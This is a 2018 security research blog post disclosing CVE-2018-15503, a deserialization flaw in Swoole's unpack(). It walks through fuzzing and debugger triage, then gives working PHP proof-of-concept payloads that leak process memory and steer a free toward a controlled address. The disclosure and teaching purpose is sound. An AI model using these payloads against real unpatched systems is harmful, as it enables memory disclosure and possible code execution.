Doomsday Vault

X-C3LL's Personal Blog :)

14 August 2018

Vulnerability in Swoole PHP extension [CVE-2018-15503]

         Last weekend I was playing around with (de)serialization in PHP when I discovered a vulnerability in the deserialization routines of Swoole (version 4.0.4). Let’s talk a bit about the vulnerability!

0x00 Introduction

         I started by looking for serialization / deserialization functions documented on PHP.net and found this little one: Swoole\Serialize->unpack(). The first step was to search for known vulnerabilities in that function because, in general, serialization / deserialization is hard to implement correctly, and this kind of function has historically been prone to interesting vulnerabilities (just keep an eye on the PHP core and all the vulnerabilities related to unserialize()). Total vulnerabilities publicly disclosed: 0. Weird as hell.

         As no vulnerability related to this function had been reported, maybe we have an opportunity :)

0x01 Getting crashes

         To generate a corpus for the fuzzing process I used as seeds the ones provided by the funserialize repo from Sean Heelan. These serialized seeds are known to trigger bugs in PHP's unserialize() function, so this kind of input is perfect for discovering problematic paths inside serialization / deserialization routines. We only need to translate the serialization format into one that Swoole understands. This stupid snippet does the job:

<?php
	$data = $argv[1];

	$test = unserialize($data);
	echo "[+] UNSERIALIZED:\n";
	var_dump($test);
	$obj = new \Swoole\Serialize();
	echo "[+] Swoole Serialized: \n";
	$sor = $obj->pack($test);
	echo bin2hex($sor) . "\n";
?>

         So with one of the test cases provided by the funserialize repo we obtain a hex output that represents the serialized object:

⇒  php tester.php 'a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}'
[+] UNSERIALIZED:
array(2) {
  [123]=>
  array(2) {
    [123]=>
    *RECURSION*
    [1]=>
    object(stdClass)#1 (1) {
      ["prop"]=>
      int(4919)
    }
  }
  [1]=>
  object(stdClass)#1 (1) {
    ["prop"]=>
    int(4919)
  }
}
[+] Swoole Serialized:
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46

         We can save this hexadecimal representation in files and then feed them to our mutator in order to generate malformed inputs. In this case, we only used a bit-flipping approach and hundreds of crashes appeared in a few minutes. To test the inputs, just use this snippet that calls the target function:

<?php
    $test = file_get_contents($argv[1]);
    $obj = new \Swoole\Serialize();
    $ser = $obj->unpack($test);
?>
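
         The bit-flipping step mentioned above can be sketched in a few lines of Python. This is only a minimal illustration, not the mutator actually used for this research: the function name `bit_flip`, the fixed RNG seed and the single-flip default are all assumptions made for the example.

```python
import random
from typing import Optional


def bit_flip(data: bytes, flips: int = 1, rng: Optional[random.Random] = None) -> bytes:
    """Return a copy of `data` with `flips` randomly chosen bits inverted."""
    rng = rng or random.Random()
    out = bytearray(data)
    for _ in range(flips):
        pos = rng.randrange(len(out) * 8)  # bit index inside the whole buffer
        out[pos // 8] ^= 1 << (pos % 8)    # invert that single bit
    return bytes(out)


# Seed: the Swoole-serialized hex string printed by tester.php.
SEED = bytes.fromhex(
    "e802ea7b02ea7b02227b0a"
    "010800737464436c617373" "018b0470726f7037130a"
    "010800737464436c617373" "018fc10037130a"
    "010800737464436c617373" "018fc1003713"
    "454f46"
)

# A fixed RNG seed (hypothetical value) keeps the mutation reproducible.
mutated = bit_flip(SEED, flips=1, rng=random.Random(1234))
print(mutated.hex())
```

         Each mutated buffer can then be written to a file and passed to the PHP snippet above; keeping the RNG seed next to each crash makes it easy to regenerate the same input later.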

0x02 Triaging a crash

         One of the crashes that looked interesting was one that… well… was not a SIGSEGV. Here it is:

Fatal error: Allowed memory size of 134217728 bytes exhausted (tried to allocate 725984920982417440 bytes) in /research/swoole-ext/hextester.php on line 5

         Hum… OK. Let's check the differences between the original (unmutated) input and the one that produces this crazy allocation:

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46
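
         Spotting a one-byte change in two long hex strings by eye is error-prone, so a small helper can do it. The sketch below is an illustration only; the function name `byte_diff` is made up for this example and the two inputs are the original and mutated strings from this post.

```python
def byte_diff(a_hex: str, b_hex: str):
    """Return (offset, old_byte, new_byte) for every position where the inputs differ."""
    a, b = bytes.fromhex(a_hex), bytes.fromhex(b_hex)
    return [(i, x, y) for i, (x, y) in enumerate(zip(a, b)) if x != y]


ORIGINAL = (
    "e802ea7b02ea7b02227b0a"
    "010800737464436c617373" "018b0470726f7037130a"
    "010800737464436c617373" "018fc10037130a"
    "010800737464436c617373" "018fc1003713"
    "454f46"
)
MUTATED = (
    "e802ea7b02ea7b02227b0a"
    "010800737464436c617373" "018b0470726f7037130a"
    "010800737464436c617373" "018fc10037130a"
    "010800737464436c617373" "018fc3003713"
    "454f46"
)

for offset, old, new in byte_diff(ORIGINAL, MUTATED):
    print(f"offset {offset}: {old:02x} -> {new:02x}")  # offset 63: c1 -> c3
```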

         Changing a 1 to a 3 makes it try to allocate almost 726 petabytes. That is insane. It is a weird number, right? But if we turn it from decimal to hexadecimal…

>>> hex(725984920982417440)
'0xa1337706f727020'

         OK, that string with a 1337 looks familiar… let's reverse its byte order…

>>> a = str(hex(725984920982417440))[3:].decode("hex")[::-1].encode("hex")
>>> print a
2070726f703713
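
         The one-liner above relies on Python 2 string codecs. For readers on Python 3, the same check can be sketched with `int.to_bytes`, which also keeps the leading `0a` byte that the `[3:]` slice drops. This is just an equivalent way of looking at the number, not a different analysis.

```python
# Requested allocation size reported in the PHP fatal error.
size = 725984920982417440

# View the 64-bit value as the bytes it would occupy in little-endian memory.
raw = size.to_bytes(8, "little")

print(raw.hex())  # 2070726f7037130a
print(raw)        # b' prop7\x13\n'
```

         The `prop` key name and the serialized integer `3713` (0x1337) are plainly visible, which is why the number looked familiar.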

         So in the deserialization process the extension is performing an allocation based on a value inside the string that we provide:

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc1003713454f46
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46

         As it tried to allocate hundreds of petabytes, we can guess that the requested size is not checked properly. And a size that is not checked correctly means tons of fun. Skimming the code, we can spot the lines where the allocation is made:

void *str_pool_addr = get_pack_string_len_addr(&buffer, &key_len);
p->key = zend_string_init((char*) str_pool_addr, key_len, 0);

         The zend_string_init function creates a zend_string structure and copies into it, from the pointer (first argument), the number of bytes given as the size (second argument). The size to copy is set by the get_pack_string_len_addr() function:

get_pack_string_len_addr(void ** buffer, size_t *strlen)
{
	...
	*strlen = *((unsigned short*) str_pool_addr);
	...

         Put a breakpoint on the allocation and reproduce the crash:

pwndbg> print key_len
$116 = 725984920982417412
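
         The key_len printed by the debugger is 28 bytes smaller than the size in the PHP fatal error. A plausible explanation, sketched below, is the overhead that PHP adds when allocating a zend_string. The 24-byte header, the extra NUL byte and the 8-byte alignment are assumptions about a 64-bit PHP 7 build, not values taken from this debugging session.

```python
requested = 725984920982417440  # size from the PHP fatal error
key_len = 725984920982417412    # value printed by the debugger

print(requested - key_len)      # 28


def zstr_alloc_size(length: int, header: int = 24, align: int = 8) -> int:
    """Assumed zend_string allocation size: header + payload + NUL, rounded up."""
    raw = header + length + 1
    return (raw + align - 1) & ~(align - 1)


print(zstr_alloc_size(key_len) == requested)  # True under the assumptions above
```

         This also accounts for the low byte being 0x20 in the error message but 0x04 in the buffer: 0x04 + 25 rounded up to a multiple of 8 is 0x20.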

         So our theory was right: the key_len extracted via get_pack_string_len_addr() is used in the allocation. In the unmutated serialized data the value is:

Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$117 = 4

         Mmm… and what if we change the original c1 to a0?

Breakpoint swoole_serialize.c:709
pwndbg> print key_len
$119 = 8030604250369323891


>>> a = str(hex(8030604250369323891))[2:].decode("hex")[::-1].encode("hex")
>>> print a
7373018b0470726f

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fc3003713454f46
e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018fa0003713454f46

         The value taken was shifted. Nice!
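
         To make the shift concrete, the two key_len values seen in the debugger can be located inside the serialized buffer as 8-byte little-endian integers. The sketch below is an illustration only: the helper name `find_u64` is made up, and the seed buffer is used because the mutated byte sits later in the data and does not affect these offsets.

```python
import struct

# Unmutated Swoole-serialized seed from this post.
SEED = bytes.fromhex(
    "e802ea7b02ea7b02227b0a"
    "010800737464436c617373" "018b0470726f7037130a"
    "010800737464436c617373" "018fc10037130a"
    "010800737464436c617373" "018fc1003713"
    "454f46"
)


def find_u64(buf: bytes, value: int) -> int:
    """Return the offset where `value` appears as a little-endian u64, or -1."""
    return buf.find(struct.pack("<Q", value))


print(find_u64(SEED, 725984920982417412))   # 24 (key_len seen with c3)
print(find_u64(SEED, 8030604250369323891))  # 20 (key_len seen with a0)
```

         One pattern worth noting, purely as an observation from these data points and not checked against the Swoole source: 0xc1 >> 3 and 0xc3 >> 3 are both 24, and 0xa0 >> 3 is 20, which matches the offsets found here.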

0x03 Getting dirty

         At this point we have triaged the issue that makes our code crash. Now it's time to start playing a bit with this little boy. If we calculate the right position, the key_len value used for the allocation will be controlled by us (as we can serialize any integer), so we can leak an arbitrary amount of memory. Let’s try to leak 255 bytes (ff):

e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46
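
         This payload differs from the seed in only two bytes, so it can be derived by patching the seed. The sketch below is an illustration: the offsets 30 and 63 were obtained by diffing the payload against the seed, not from any description of the Swoole format, and the helper name `patch` is made up for the example.

```python
# Unmutated Swoole-serialized seed from this post.
SEED = bytes.fromhex(
    "e802ea7b02ea7b02227b0a"
    "010800737464436c617373" "018b0470726f7037130a"
    "010800737464436c617373" "018fc10037130a"
    "010800737464436c617373" "018fc1003713"
    "454f46"
)


def patch(buf: bytes, changes: dict) -> bytes:
    """Return a copy of `buf` with the bytes at the given offsets replaced."""
    out = bytearray(buf)
    for offset, value in changes.items():
        out[offset] = value
    return bytes(out)


# Offset 30: high byte of the serialized integer (13 -> ff), the length we want.
# Offset 63: byte of the last entry that selects where key_len is read (c1 -> f1).
leak_payload = patch(SEED, {30: 0xFF, 63: 0xF1})
print(leak_payload.hex())
```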


<?php
	$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037ff0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f46";
	$obj = new \Swoole\Serialize();
	$sor = hex2bin($data);
	$ser = $obj->unpack($sor);
	echo "[+] Swoole Unserialized:\n";
	var_dump($ser);
	echo "[+] Memory Leaked:\n";
	$keys = key(get_object_vars($ser[1]));
	echo bin2hex($keys);
	echo "\n[+] Size: \n";
	echo strlen($keys);
?>

         Nailed!

⇒  php memory_leak.php
[+] Swoole Unserialized:
array(2) {
  [123]=>
  array(2) {
    [123]=>
    array(2) {
      [123]=>
      NULL
      [1]=>
      object(stdClass)#2 (1) {
        ["prop"]=>
        int(-201)
      }
    }
    [1]=>
    object(stdClass)#3 (1) {
      ["prop"]=>
      int(4919)
    }
  }
  [1]=>
  object(stdClass)#4 (1) {
    ["
stdClass7
stdClass7EOFH@@`p@ @P@"]=>
    int(4919)
  }
}
[+] Memory Leaked:
0a010800737464436c617373018fc10037130a010800737464436c617373018ff1003713454f460000c0f0c702bd
7f000048f0c702bd7f0000400000000000000040b2c702bd7f00000614000002000000050200000200000060f0c7
02bd7f000070f0c702bd7f00004000000000000000c093c602bd7f00000614000003000000000100000300000020
f1c702bd7f0000400000000000000050b1c602bd7f000006140000030000004000000000000000c815c002bd7f00
00061400000300000080000000030000000000000000000000000000000000000000000000000000000000000000
00000080f1c702bd7f00000e02000003000000c8f0c702bd7f
[+] Size:
255

         With a bit of playing you can perform bigger leaks, like this one (24946 bytes):


<?php
	$data = "e802ea7b02ea7b02227b0a010800737464436c617373018b0470726f7037130a010800737464436c617373018fc10037130a010800737464436c617373018ff6003713454f46";
	$obj = new \Swoole\Serialize();
	$sor = hex2bin($data);
	$ser = $obj->unpack($sor);
	echo "[+] Swoole Unserialized:\n";
	var_dump($ser);
	echo "[+] Memory Leaked:\n";
	$keys = key(get_object_vars($ser[1]));
	echo bin2hex($keys);
	echo "\n[+] Size: \n";
	echo strlen($keys);
?>

0x04 Getting even dirtier

         Let’s swap our seed ('a:3:{i:123;s:4:"meow";i:123;R:1;i:1;O:8:"stdClass":1:{s:4:"prop";i:4919;}}') for one with a bigger integer (0x41414141 == 1094795585) and compare the two:

[4919 (0x1337)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 8b 04 70726f70 37130a
01 08 00 737464436c617373
01 8f c1 0037130a
01 08 00 737464436c617373
01 8f c1 003713
454f46

[1094795585 (0x41414141)]
e8 02 ea7b 02ea 7b 02 22 7b0a
01 08 00 737464436c617373
01 93 04 70726f70 414141410a
01 08 00 737464436c617373
01 97 c1 00414141410a
01 08 00 737464436c617373
01 97 c1 0041414141
454f46
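
         The integer payloads in both dumps read naturally as little-endian values of different widths. A quick sketch to confirm this, using only the bytes shown in the two dumps (the helper name `le_int` is made up for the example):

```python
def le_int(hex_bytes: str) -> int:
    """Decode a hex string as an unsigned little-endian integer."""
    return int.from_bytes(bytes.fromhex(hex_bytes), "little")


print(le_int("3713"))      # 4919 (0x1337), stored in 2 bytes
print(le_int("41414141"))  # 1094795585 (0x41414141), stored in 4 bytes
```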

         So the difference is a change from 8f (with 2 bytes, 3713) to 97 (with 4 bytes, 41414141); note that the difference between 8f and 97 is 8. What happens if we change that 97 to 8f in the last entry?

e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c617373018fc10041414141454f46

[+] Swoole Unserialized:
array(2) {
  [123]=>
  array(2) {
    [123]=>
    array(2) {
      [123]=>
      NULL
      [1]=>
      object(stdClass)#2 (1) {
        ["prop"]=>
        int(1094795585)
      }
    }
    [1]=>
    object(stdClass)#3 (1) {
      ["prop"]=>
      int(1094795585)
    }
  }
  [1]=>
  object(stdClass)#4 (1) {
    ["prop"]=>
    int(16705)
  }
}

         Getting 16705 instead of the expected 1094795585 means that only 2 bytes were taken (16705 == 0x4141). What happens if we set that byte to zero?

e802ea7b02ea7b02227b0a010800737464436c61737301930470726f70414141410a010800737464436c6173730197c100414141410a010800737464436c6173730100c10041414141454f46

...
   44 static zend_always_inline void i_zval_ptr_dtor(zval *zval_ptr ZEND_FILE_LINE_DC)
   45 {
   46   if (Z_REFCOUNTED_P(zval_ptr)) {
   47           zend_refcounted *ref = Z_COUNTED_P(zval_ptr);
 ► 48           if (!--GC_REFCOUNT(ref)) {
   49                   _zval_dtor_func(ref ZEND_FILE_LINE_RELAY_CC);
   ....
Program received signal SIGSEGV (fault address 0x41414141)

pwndbg> i r
rax            0x41414141       1094795585
rbx            0x0      0
rcx            0x14     20
rdx            0x1      1
rsi            0x7ffff3864b60   140737279052640
rdi            0x7ffff38023f0   140737278649328
rbp            0x7fffffff7480   0x7fffffff7480
rsp            0x7fffffff73d0   0x7fffffff73d0
r8             0xffff   65535
r9             0x7fffffff79fc   140737488321020
r10            0x941    2369
r11            0x555555bbc584   93824998950276
r12            0x555555684d10   93824993479952
r13            0x7fffffffe460   140737488348256
r14            0x7ffff381c030   140737278754864
r15            0x7ffff3870160   140737279099232
rip            0x555555bc0850   0x555555bc0850 <zend_array_destroy+487>
eflags         0x10202  [ IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0

         Oh snap! Is that a mighty zval_ptr_dtor? Is that our brave 0x41414141? And can we copy structures freely as we saw before? Can we leak memory too? This looks like an adventure for you, my dearest reader :).

0x05 Final words

         The vulnerability is already patched in the GitHub master branch (it is a live project with almost daily updates). I am not sure if this kind of article is useful, but at least it works as a “log” for myself. If you find it interesting, or spot any error or typo, feel free to contact me on Twitter (@TheXC3LL).